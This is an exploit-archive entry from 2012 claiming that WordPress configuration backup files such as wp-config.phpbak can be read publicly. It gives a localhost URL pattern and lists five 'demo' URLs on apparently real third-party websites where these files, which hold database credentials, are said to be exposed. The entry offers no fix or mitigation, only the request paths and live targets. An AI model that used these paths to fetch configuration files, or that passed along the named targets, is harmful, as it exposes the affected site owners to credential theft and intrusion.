id: 19491
date: 09/28/2012
title: Wordpress phpBAK read Config Vulnerability
author: Angel Injection
cves: 

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Angel Injection member from Inj3ct0r Team          1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] Wordpress phpBAK read Config Vulnerability
[-] Found by Angel Injection
[-] Version: N/A
[-] Security -::RISK: high
[-] platforms: php
[-] Dork: For Dork i'm not a ked ^_*

vuln in wp-config.phpbak it's can accses to red it

http://localhost/wp-config.phpbak


Demo urls
http://www.aftercareplanning.com/wp-config.phpBAK
http://www.supplychainnetwork.com/wp-config.phpbak
http://mlmjwilliams.com/wp-config.php-bak
http://djmarzo.co.uk/wp-config.phpbak
http://cuothe.pundit.ca/cuothe/wp-config.php-bak



#  0day.today [2023-03-25]  #